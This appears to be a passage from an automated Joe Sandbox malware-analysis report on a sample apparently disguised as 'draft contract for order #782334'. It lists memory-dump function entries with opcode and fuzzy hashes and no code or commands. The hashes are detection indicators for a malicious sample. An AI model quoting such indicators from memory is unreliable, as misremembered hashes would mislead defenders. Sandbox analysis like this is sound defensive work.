                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: eabe79c714d32698ab53df33f046e9e844b0aff7dbef238cc03ccd7523a79439
                                                                                                                        • Instruction ID: 870a00d97be755f4a691762705a84be19df88901ec91b8df9cf6bc37effad1ec
                                                                                                                        • Opcode Fuzzy Hash: eabe79c714d32698ab53df33f046e9e844b0aff7dbef238cc03ccd7523a79439
                                                                                                                        • Instruction Fuzzy Hash: DB11E772740A11BFD72266599C85FABF6D9DFD4B60F610028B709CB184EB60DD0187A5
                                                                                                                        Function 01780946 Relevance: .1, Instructions: 70COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2adacd0ef51abaa0d645c84f21fe1d661e16813a0242857f5aead4be7c6b3ce7
                                                                                                                        • Instruction ID: b08e5627a1266a024c251a87549a24a3c4fa957fb084e1f6fa4a5d17cdaf851d
                                                                                                                        • Opcode Fuzzy Hash: 2adacd0ef51abaa0d645c84f21fe1d661e16813a0242857f5aead4be7c6b3ce7
                                                                                                                        • Instruction Fuzzy Hash: 4E21E3B1E40209EFCB20DFAAD884AAEFBF8FF98710F10012FE505A7244D6709945CB64
                                                                                                                        Function 017980A8 Relevance: .1, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                        • Instruction ID: 6cf8c5707ddbca2bcad46de7c5176f7c1b117e5c42f3e1bb5a04c3d837d30632
                                                                                                                        • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                        • Instruction Fuzzy Hash: 64218EB2A00209EFDF129F98DC44BAEFBB9EF89350F244859F910A7251E734D9509B50
                                                                                                                        Function 01730124 Relevance: .1, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                        • Instruction ID: 4909b75a7df67f33bf0449de7cf7d956cca125d77be2518e5e798ddf13d8c23e
                                                                                                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                        • Instruction Fuzzy Hash: 4911DD73601605AFE722DA48CC84F9EBBB8EB84754F100029F6018F191D671ED44DB60
                                                                                                                        Function 01708770 Relevance: .1, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a7ba5855b3869ecbc10df6112b36381209d03ff75a9b4dd8489f18bbf390af53
                                                                                                                        • Instruction ID: eecfb0c04cff2c8313982f094e4bc2028b203d2c421c7d10b011cb21607671a6
                                                                                                                        • Opcode Fuzzy Hash: a7ba5855b3869ecbc10df6112b36381209d03ff75a9b4dd8489f18bbf390af53
                                                                                                                        • Instruction Fuzzy Hash: E911B271B00711DBDB12CF8DC480A56FBE9AF9A714B18407EEE08DF249D6B2D9018B92
                                                                                                                        Function 0173AAEE Relevance: .1, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                        • Instruction ID: 1baf8f100a45b8c99ea0850371f00118d6813b0b7b899858b3e54f74861df491
                                                                                                                        • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                        • Instruction Fuzzy Hash: 13217972600A41DFDB298F4DC545A66FBE6EBD4B10F14887DE58ACBA26C731EC01CB80
                                                                                                                        Function 017080E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ebb88c67ff014eb6e8006d4424f011046204649a94603330a7763ae40ad92174
                                                                                                                        • Instruction ID: e2587b46b9027b34d9675717590d8bb956bff48774ddfd63f0cd771740c9835e
                                                                                                                        • Opcode Fuzzy Hash: ebb88c67ff014eb6e8006d4424f011046204649a94603330a7763ae40ad92174
                                                                                                                        • Instruction Fuzzy Hash: 9F216835A00206DFCB15CF98C580AAAFBF6FF88318F2441ADD105AB354CB71AD06CB91
                                                                                                                        Function 0173674D Relevance: .1, Instructions: 65COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3717451835b9f338b5938146a52055c0e690e61f42eb1736af9e1d01507745ed
                                                                                                                        • Instruction ID: 519377f183e67e008f6ce3bddadc9c78c0ae36e3cb5caf69d70fcedf778c0711
                                                                                                                        • Opcode Fuzzy Hash: 3717451835b9f338b5938146a52055c0e690e61f42eb1736af9e1d01507745ed
                                                                                                                        • Instruction Fuzzy Hash: EF215C75600A01EFD7219F69C881B66F7F8FF84650F44882DF5AAC7252EB70E950CBA1
                                                                                                                        Function 01796870 Relevance: .1, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2262b8ec460cf4a708550b22a8a106bd0bcb66ad89fc922db3e134d5a3853254
                                                                                                                        • Instruction ID: a6417cec0ee7762771cbd231139196967c5814e45b9e6630d6d18d38b69b3ada
                                                                                                                        • Opcode Fuzzy Hash: 2262b8ec460cf4a708550b22a8a106bd0bcb66ad89fc922db3e134d5a3853254
                                                                                                                        • Instruction Fuzzy Hash: BB11C132240514EBCB22DB5DE940F9AFBA8EB99A60F114129F2019B251DA70E809C790
                                                                                                                        Function 0172E8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3c2144777fdf3f090b2f9c0f25f9a5787cbcc26cfa9ee29d07108a4cabf5649a
                                                                                                                        • Instruction ID: 45bc4d14012fb721a2b52a8d3ef662931c6dfc312d2ee063cd762639567071d6
                                                                                                                        • Opcode Fuzzy Hash: 3c2144777fdf3f090b2f9c0f25f9a5787cbcc26cfa9ee29d07108a4cabf5649a
                                                                                                                        • Instruction Fuzzy Hash: F11108333041249FCB19DB29DC95A6BF25AEFD5370B254539EA228B395ED309802C391
                                                                                                                        Function 017366B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 69b885ad8662db6f3da79ff423c10e345c481de47b2fd22465da64dfe5c34adb
                                                                                                                        • Instruction ID: 660e852266356b4d952d56cf7eaef0efa722a73c09eb67f4c2f3efeb6d811b05
                                                                                                                        • Opcode Fuzzy Hash: 69b885ad8662db6f3da79ff423c10e345c481de47b2fd22465da64dfe5c34adb
                                                                                                                        • Instruction Fuzzy Hash: 7011BF76A01205EBCB26DF59C580A5AFBE5EBC4650B518079E9059B316E630DE00CBA0
                                                                                                                        Function 017CA8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                        • Instruction ID: 1eef5b761b4679f8930a04d62a27094183a4286716d9e9f0c52d928bf63378d1
                                                                                                                        • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                        • Instruction Fuzzy Hash: D8110436A00909AFDB19CB58C845B9DFBB5EF84710F05826DE84597344E631BE41CB80
                                                                                                                        Function 01700AD0 Relevance: .1, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                        • Instruction ID: 65fc7179ac838f9f0f8db4054171bb5b9dac7d10f03f24145475155999845ce2
                                                                                                                        • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                        • Instruction Fuzzy Hash: 8C2106B5A00B059FD3A0CF29D440B52BBF4FB48B20F10492EE98AC7B50E371E814CB90
                                                                                                                        Function 0178E7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                        • Instruction ID: faf975da205d00c1fd6dd3b0f36308f3a3c4eb4a26c3db1672da744c81a62b05
                                                                                                                        • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                        • Instruction Fuzzy Hash: C811A0326D0601EFE721AF49C848B5EFBE5EF45754F059428EA099B260DF71DC40DB90
                                                                                                                        Function 017227ED Relevance: .1, Instructions: 58COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 42ec02f72b49c9a6554dfcd198bf57e087792bab803fd94b5348dd10c0b1ae30
                                                                                                                        • Instruction ID: c0b170e8ee045eed2efedda403a4a1bae8e9490620533c60cd29d47f7a1be958
                                                                                                                        • Opcode Fuzzy Hash: 42ec02f72b49c9a6554dfcd198bf57e087792bab803fd94b5348dd10c0b1ae30
                                                                                                                        • Instruction Fuzzy Hash: 6E014931745685AFE316A66EDC48F27FB8CEF90390F0500B5FD009B296DA54DC01C271
                                                                                                                        Function 01704690 Relevance: .1, Instructions: 57COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8d101467eaa5e8478038658f2398112c9c5a3d8b5026ddd424fb7242ac9780c0
                                                                                                                        • Instruction ID: cca00b15c86cd606229ca11550e41065146dc7b054c2fd7b14d89451c839b635
                                                                                                                        • Opcode Fuzzy Hash: 8d101467eaa5e8478038658f2398112c9c5a3d8b5026ddd424fb7242ac9780c0
                                                                                                                        • Instruction Fuzzy Hash: 4711A036600745EFDB27CF5DD944B56BBE8EB86764F005119FA068B690C770E800CF60
                                                                                                                        Function 017D4B00 Relevance: .1, Instructions: 57COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8b688fcb5cfa3dd8b388b52e6bcbdc6acfcee4c63b5fc0e452e44097eafc62ad
                                                                                                                        • Instruction ID: 312e1d4d84b878de25ba4905e9eb24e115d72aadfb9bf6f5c71552289956f4e9
                                                                                                                        • Opcode Fuzzy Hash: 8b688fcb5cfa3dd8b388b52e6bcbdc6acfcee4c63b5fc0e452e44097eafc62ad
                                                                                                                        • Instruction Fuzzy Hash: 3E11C2362006199FD7229B6DD844F67F7B6FFD4720F194429EA8787A94DA30A802CB90
                                                                                                                        Function 01736620 Relevance: .1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a51e11c605ceb8dd39a41ac11a568dee162a484d90fea5302c42b8e3c7395819
                                                                                                                        • Instruction ID: 6ead4c3d4cc822fcc186ec53b81fb78956d4995d65eb0771bd791df9f077ff45
                                                                                                                        • Opcode Fuzzy Hash: a51e11c605ceb8dd39a41ac11a568dee162a484d90fea5302c42b8e3c7395819
                                                                                                                        • Instruction Fuzzy Hash: B1118272A00715FBDB22DF59C984B5EFBB8FF84790F510459EA01A7245D730AE019B60
                                                                                                                        Function 0172EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a216ca72cf9d660dfb4968e1d0c58131b90ea08d986a17045ea1c32bbc6b59f4
                                                                                                                        • Instruction ID: f6d62f2e7707a9bba2c4763c8daed040a51fec3c01dc22b0ee581887c0348749
                                                                                                                        • Opcode Fuzzy Hash: a216ca72cf9d660dfb4968e1d0c58131b90ea08d986a17045ea1c32bbc6b59f4
                                                                                                                        • Instruction Fuzzy Hash: C4019E7150120A9FC725DF19D448F26FBF9EB85324F21816EE2058B2A8CB70AD82CB90
                                                                                                                        Function 0172E53E Relevance: .1, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                        • Instruction ID: 35e54029b00838ee43cf05dbbc7f0aafdd3c82125fbf8118db311e470639d43b
                                                                                                                        • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                        • Instruction Fuzzy Hash: EA110C712116D19BE723972DD968F25F7D8FF01754F1900E0DD41C7642F728C982C650
                                                                                                                        Function 0178E75D Relevance: .1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                        • Instruction ID: c8a28e996fd46f0966e681a1791f1d1a0e5cb9205ff0c77926077d404b98d63f
                                                                                                                        • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                        • Instruction Fuzzy Hash: 33019236640205EFE725BF58CC08F5AFBA9EB95760F058474EA059B264EB71DD80C790
                                                                                                                        Function 016FA250 Relevance: .1, Instructions: 52COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                        • Instruction ID: a73b6e0ceeae27a3068a9400c6c1adf3fb0bb37b66932eefced177091554f87a
                                                                                                                        • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                        • Instruction Fuzzy Hash: EA012635604B219BCB318F99EC40A327BA4EF55770704C62DFE998B281C731D401CBA0
                                                                                                                        Function 017D4940 Relevance: .1, Instructions: 52COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3aa8352d21504409645d1e377c82fa36c7ad44a6f58fb2a7fc0ac6bea989e970
                                                                                                                        • Instruction ID: eece90d06cd5b907cd939ff715d347b8dfbdfb04b7f5afeda73ebe393426707a
                                                                                                                        • Opcode Fuzzy Hash: 3aa8352d21504409645d1e377c82fa36c7ad44a6f58fb2a7fc0ac6bea989e970
                                                                                                                        • Instruction Fuzzy Hash: 120145335412059FC332DF1EC844E12FBB8EB81770B254265E9AA9B5AAE730EC01CBC0
                                                                                                                        Function 0177E1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5965993aa4ce8ddc20320f4189e16413a02a8f28534ce97c085479aab226fbe1
                                                                                                                        • Instruction ID: 35df96cc259612313d1af53a4f382ce2ec42940904ae87bad46a781c982b4bb2
                                                                                                                        • Opcode Fuzzy Hash: 5965993aa4ce8ddc20320f4189e16413a02a8f28534ce97c085479aab226fbe1
                                                                                                                        • Instruction Fuzzy Hash: 5211CB32241601EFCB26AF09C880F06BBB8FF58B44F2000A8EA058B6A1C631ED01CA90
                                                                                                                        Function 01706259 Relevance: .1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 09e87c1217c78027db69dc26d2eeafff44ed387867a92b83bfca19bba76b26eb
                                                                                                                        • Instruction ID: 6f7c75bc1a0d11d42ef2685a7998a6657fa8432e817fa6834c045231f8cd6ed3
                                                                                                                        • Opcode Fuzzy Hash: 09e87c1217c78027db69dc26d2eeafff44ed387867a92b83bfca19bba76b26eb
                                                                                                                        • Instruction Fuzzy Hash: DE119A70641229ABDB26EF24CC56FE9B3B4AF04720F5041D4B318A60E5EB309E91CF84
                                                                                                                        Function 01786050 Relevance: .0, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8a9e9df10f6a731dedff75217ba08f67ee0009a6fa07441a9b85d0efc2efd84d
                                                                                                                        • Instruction ID: 99b660a1ae438a3fe193cb3d138b3918e186e86c69de24a3b057d66003f2526c
                                                                                                                        • Opcode Fuzzy Hash: 8a9e9df10f6a731dedff75217ba08f67ee0009a6fa07441a9b85d0efc2efd84d
                                                                                                                        • Instruction Fuzzy Hash: BB111776900019BBCB16EB94CC84EDFBB7DEF48254F044166A906E7211EA34AA55CBE0
                                                                                                                        Function 0170208A Relevance: .0, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                        • Instruction ID: 460c8f8bcd715e79abea9c1efeedec6c980f266c6fffe6c71da83181a7476328
                                                                                                                        • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                        • Instruction Fuzzy Hash: EF01F533200310CBDF52CA2DD888A52F7ABBFC4610F5544A5ED458F29BDAB1C881C3A0
                                                                                                                        Function 01796500 Relevance: .0, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4da73f909de50b1ebd94f7f583694f997c96623439c4d5e9d044aff3771d574e
                                                                                                                        • Instruction ID: 026ba98c6c26508fb022e9b0c12688bfe7abe1b8e5c2b88edc62304ceccd665d
                                                                                                                        • Opcode Fuzzy Hash: 4da73f909de50b1ebd94f7f583694f997c96623439c4d5e9d044aff3771d574e
                                                                                                                        • Instruction Fuzzy Hash: C311E5726001459FC701CF18E400BA2FBB5FB5A314F188259F8448B315D731EC84CBA0
                                                                                                                        Function 0178C810 Relevance: .0, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7ae47875e09254b16e5e2bc3777a8ed709695807652362966965de626962a3c4
                                                                                                                        • Instruction ID: 2359c43f7abcd868d2b6fe4401b95d1d5dee215014c13ee12a98092c576784aa
                                                                                                                        • Opcode Fuzzy Hash: 7ae47875e09254b16e5e2bc3777a8ed709695807652362966965de626962a3c4
                                                                                                                        • Instruction Fuzzy Hash: 9E1118B1A102099FCB00DFA9D545AAEFBF8FF58250F10806AA905E7355D674EA018BA4
                                                                                                                        Function 017AEA60 Relevance: .0, Instructions: 50COMMON
